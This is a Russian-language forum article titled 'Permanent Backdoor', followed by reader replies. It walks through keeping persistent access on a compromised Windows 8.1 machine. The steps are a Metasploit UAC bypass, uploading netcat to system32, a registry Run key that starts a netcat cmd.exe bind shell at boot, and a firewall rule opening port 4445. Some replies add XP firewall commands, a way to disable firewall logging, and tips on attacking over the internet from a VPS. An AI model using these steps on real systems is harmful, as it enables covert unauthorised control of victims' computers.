Статья Permanent Backdoor

Привет! В данной публикации, я покажу, как осуществить постоянный доступ к уязвимому, к примеру, посредством reverse shell (meterpreter) компьютеру.

upload_2016-10-31_21-14-49.png


В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.101 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.109. Итак, нам понадобится открытая сессия meterpreter:

upload_2016-10-31_21-15-24.png


Для продолжения, необходимо обойти UAC на целевом хосте:

> use exploit/windows/local/bypassuac_injection

И по порядку выполняем команды, как показано на скриншоте ниже:

upload_2016-10-31_21-15-50.png


В случае успеха вывод команды getsystem будет таким:

upload_2016-10-31_21-16-18.png


Теперь, необходимо загрузить на целевую систему программу netcat - это утилита Unix, позволяющая устанавливать соединения TCP и UDP, принимать оттуда данные и передавать их. Делается это следующим образом, вводим в консоли meterpreter:

> upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32

upload_2016-10-31_21-16-51.png


Затем редактируем реестр цели, для запуска netcat при загрузке:

> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat –d ‘C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe’


upload_2016-10-31_21-17-43.png


Открываем shell, для того чтобы внести свои поправки в firewall целевого хоста.

> shell

upload_2016-10-31_21-18-18.png


Вносим правило в firewall:

> netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445

netsh —
программа, включенная в линейку продуктов операционных систем Microsoft Windows NT начиная с Windows 2000. Она позволяет осуществлять локальное или удаленное конфигурирование сетевых параметров.

upload_2016-10-31_21-20-47.png


Убедимся, что наши усилия не прошли даром, и правило было успешно добавлено:

> netsh firewall show portopening

upload_2016-10-31_21-21-27.png


Все ок. Перезагрузим целевой хост, а перед этим откроем второй терминал в Kali и введем команду:

> nc -nv 192.168.0.109 4445 (Где 192.168.0.109 – адрес целевой машины)

После перезагрузки получаем shell на целевой системе:

upload_2016-10-31_21-22-43.png
 

dandu

Green Team
19.10.2016
21
4
BIT
0
После ввода команды "exploit" выводит ошибку:
Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
Exploit complated, but no session was created.
 
M

MAdDog719

Уточните, пожалуйста, на каком windows это протестировано? на Win 10 работать будет?
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Уточните, пожалуйста, на каком windows это протестировано? на Win 10 работать будет?
В начале писал - В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.101 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.109.
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Очевидно же, что эксплойт ругается на номер сессии. У вас точно есть активная сессия meterpreter под номером 1?
 
O

objque

Возможно ли настроиться для работы не из одной локальной сети?
В наличии vps'ка, на которой крутится kali2 и, для примера, домашняя пека с win7 на борту.

Все примеры по reverse_tcp только в локальной сети :(

Надеюсь на вашу помощь, спасибо!
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Возможно ли настроиться для работы не из одной локальной сети?
В наличии vps'ка, на которой крутится kali2 и, для примера, домашняя пека с win7 на борту.

Все примеры по reverse_tcp только в локальной сети :(

Надеюсь на вашу помощь, спасибо!
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/ - Посмотрите тут, эта схема работает
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Возможно ли настроиться для работы не из одной локальной сети?
В наличии vps'ка, на которой крутится kali2 и, для примера, домашняя пека с win7 на борту.

Все примеры по reverse_tcp только в локальной сети :(

Надеюсь на вашу помощь, спасибо!
Добрый день,, все тоже самое..только место локального своего ip указываете ip на vps.Бывают конечно небольшие отличия , но это зависит от каждого конкретного случая,некоторые виды пентеста можно сделать только в сегменте локальной сети.Иногда у меня сессия не работает с reverse_tcp я тогда заменяю на reverse_https.Старайтесь не действовать по шаблону.,шаблон хорош когда вы осваиваете. Я вообще пентест сравниваю с шахматами,но это сугубо мое личное мнение.
 
  • Нравится
Реакции: Dmitry88 и Vander

koldonuuchu

Green Team
04.11.2016
36
46
BIT
0
Хочу посоветовать вам начать с основ сетей (проброс порта, классы подсетей и т.д) И у вас не будет таких вопросов
 
  • Нравится
Реакции: Vander
I

Ishikawa

На каком-то сайте я уже видел эту статью, только английскую версию.
 
I

Ishikawa

На всякий случай: если нужно добавить правила в огнестенку на Winxp, то advfirewall не работает.
Нуно что-то вроде:
netsh firewall add portopening protocol=TCP port=4445 name=netcat
netsh firewall add allowedprogram C:\WINDOWS\System32\nc.exe

И не мешало бы:
netsh firewall set logging %systemroot%\system32\LogFiles\Firewall\pfirewall.log 4096 DISABLE DISABLE
 
  • Нравится
Реакции: Vander
I

Ishikawa

p.s. и есть одно важное уточнение. Допустим получили meterpreter-сессию.
Пробуем добавить правила в фаерволл, и если нам сообщается, что он выключен, то его нужно включить (пример для WinXP):
sc config SharedAccess start= auto
а потом запустим net start SharedAccess. Через минуту потеряем сессию.
При повторной попытке провести эксплойт, msf вам радостно сообщит, что эксплойт прошел, но сессию создать никак не выйден.
Nmap -v <host> -p <port> вам покажет печальную картину, что все порты фильтруются.
Т.о. сами отрубим себе руки :)
 
  • Нравится
Реакции: ghostphisher и Vander

thunder

Green Team
08.12.2016
219
26
BIT
0
Vander: Вы уж ..простите за глупый вопрос.. Данным способом можно получить права администратора (getsystem) на windows 7 ?
 

thunder

Green Team
08.12.2016
219
26
BIT
0
Vander: Уж не знаю ..правильно ли я делал (улыбнуло) . Сам вирус делал по этому (видео)
, дальше дела по вашему гайду .. Сюда по всему что то получилось
... Еще раз вопрос .. сие действие возможно сделать в глобальной сети (я имею ввиду не только на виртуальной машине ) ? Как то непонятно(улыбнуло) мне в команде слово "local"
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!